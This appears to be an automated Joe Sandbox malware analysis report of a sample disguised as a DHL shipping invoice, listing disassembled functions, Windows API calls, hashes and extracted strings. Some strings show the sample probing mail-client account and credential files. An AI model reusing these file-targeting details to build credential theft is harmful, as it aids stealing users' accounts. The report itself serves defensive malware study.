                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2531174081-0
                                                                                                                                                                                                                                      • Opcode ID: 165d7cb729b0b1d8dbd40609dc1f72fd4c041b11e62b4558e2d47e9179cb1f78
                                                                                                                                                                                                                                      • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 165d7cb729b0b1d8dbd40609dc1f72fd4c041b11e62b4558e2d47e9179cb1f78
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                                      • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                      • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                                                                                                      • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                                      • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                                                                                      • Opcode ID: b3fdf1977b6322b79f2de70fe62da7d4d8df1abbe89a1d301570377ab221975a
                                                                                                                                                                                                                                      • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3fdf1977b6322b79f2de70fe62da7d4d8df1abbe89a1d301570377ab221975a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 34651038
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3465104B
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 34651061
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 34651075
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 34651090
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 346510B8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3594823470-0
                                                                                                                                                                                                                                      • Opcode ID: 4980b4182eaacc447b7377f98745503255ac2c926b9a33baa0f45aaa1c171460
                                                                                                                                                                                                                                      • Instruction ID: fe30ffa6ff8119fe773ff627abc6727530929ab145bf9f5e127883e231472cf9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4980b4182eaacc447b7377f98745503255ac2c926b9a33baa0f45aaa1c171460
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2217F79D00329ABDF60DE64DC48EDB376CEF44254F1042D6E859971B2DE309A86CB45
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 34651E89: lstrlenW.KERNEL32(?,?,?,?,?,346510DF,?,?,?,00000000), ref: 34651E9A
                                                                                                                                                                                                                                        • Part of subcall function 34651E89: lstrcatW.KERNEL32(?,?,?,346510DF,?,?,?,00000000), ref: 34651EAC
                                                                                                                                                                                                                                        • Part of subcall function 34651E89: lstrlenW.KERNEL32(?,?,346510DF,?,?,?,00000000), ref: 34651EB3
                                                                                                                                                                                                                                        • Part of subcall function 34651E89: lstrlenW.KERNEL32(?,?,346510DF,?,?,?,00000000), ref: 34651EC8
                                                                                                                                                                                                                                        • Part of subcall function 34651E89: lstrcatW.KERNEL32(?,346510DF,?,346510DF,?,?,?,00000000), ref: 34651ED3
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3465122A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                      • API String ID: 1475205934-1520055953
                                                                                                                                                                                                                                      • Opcode ID: 67d826e403f868ec8420daa5c3bb160bbb19bb1e4618bf455481faf53a5ecd86
                                                                                                                                                                                                                                      • Instruction ID: e706fd785550f3f5befeef846fb01e5d9125183d43abecea455932b07eab1471
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67d826e403f868ec8420daa5c3bb160bbb19bb1e4618bf455481faf53a5ecd86
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8621A7B9E10218BBEB109B90EC81FED7339EF40714F000596F605EB1E0EAB15D818B5D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00441800,00441800,0043F000,0040336A,00441800,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                                                      • CharNextW.USER32(?,00000000,00441800,00441800,0043F000,0040336A,00441800,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                                      • CharPrevW.USER32(?,?,00441800,00441800,0043F000,0040336A,00441800,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                      • String ID: *?|<>/":
                                                                                                                                                                                                                                      • API String ID: 589700163-165019052
                                                                                                                                                                                                                                      • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                                      • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,34654AEA,?,?,34654A8A,?,34662238,0000000C,34654BBD,00000000,00000000), ref: 34654B59
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 34654B6C
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,34654AEA,?,?,34654A8A,?,34662238,0000000C,34654BBD,00000000,00000000,00000001,34652082), ref: 34654B8F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: 030ab6c9a32854a751a0db571f88afbf9c4f98eb8a1511c4d5d6161e561bf4b9
                                                                                                                                                                                                                                      • Instruction ID: 8ac1f1a4119a92dc8c80eed8a56b0d5c7beba6b23701ce9a083982e84d54705d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 030ab6c9a32854a751a0db571f88afbf9c4f98eb8a1511c4d5d6161e561bf4b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4F06275900108BFDB119F91DC08F9EBFB9EF44365F4081E8F805B61A1DB319A82CE95
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,34659C07,?,00000000,?,00000000,00000000), ref: 346594D4
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 34659590
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,34659C07,00000000,?,?,?,?,?,?,?,?,?,34659C07,?), ref: 346595AF
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,34659C07,00000000,?,?,?,?,?,?,?,?,?,34659C07,?), ref: 346595E8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 977765425-0
                                                                                                                                                                                                                                      • Opcode ID: 1a29618db88f9e124caadfae90638e5a1be3e36c2fc4dc303997e98cdf4d6375
                                                                                                                                                                                                                                      • Instruction ID: 9b62fda3dbe1f48c4ba8c8256f2fcdaeeacaee54f9bdc0868eee8edc4df621e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a29618db88f9e124caadfae90638e5a1be3e36c2fc4dc303997e98cdf4d6375
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1551C2B5A00249AFEB00CFA4C895ADEBBF8EF18300F14459EE951E7291E7309949CF65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,0040A5D0,00440000,?,?,00000031), ref: 004017B0
                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,0040A5D0,0040A5D0,00000000,00000000,0040A5D0,00440000,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                        • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,?,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,?,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                                        • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,?,757C23A0), ref: 0040537D
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1941528284-0
                                                                                                                                                                                                                                      • Opcode ID: 6e9a8046af19eb094d6abfdf57eef79a3d41af2fa463d12146f877a34a213090
                                                                                                                                                                                                                                      • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e9a8046af19eb094d6abfdf57eef79a3d41af2fa463d12146f877a34a213090
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3808545654-0
                                                                                                                                                                                                                                      • Opcode ID: 0df72e3b5cf70d21c530e24e682e28afae01b7faaf581061804cefe84a28b9e7
                                                                                                                                                                                                                                      • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0df72e3b5cf70d21c530e24e682e28afae01b7faaf581061804cefe84a28b9e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,346510DF,?,?,?,00000000), ref: 34651E9A
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,346510DF,?,?,?,00000000), ref: 34651EAC
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,346510DF,?,?,?,00000000), ref: 34651EB3
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,346510DF,?,?,?,00000000), ref: 34651EC8
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,346510DF,?,346510DF,?,?,?,00000000), ref: 34651ED3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 493641738-0
                                                                                                                                                                                                                                      • Opcode ID: 5c97401e56c118ce6af2cadf53eac4a1bbe0060c44092b62a2bff9b1615de5f1
                                                                                                                                                                                                                                      • Instruction ID: 14c116999c647f8a9c24e61e7df9f649fda6ec6c71b8c284f04042f38d4bda14
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c97401e56c118ce6af2cadf53eac4a1bbe0060c44092b62a2bff9b1615de5f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F0E9265001107AD3216F19AC85EBF777CEFC5BA0F40405DF50893191AB54584382BA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
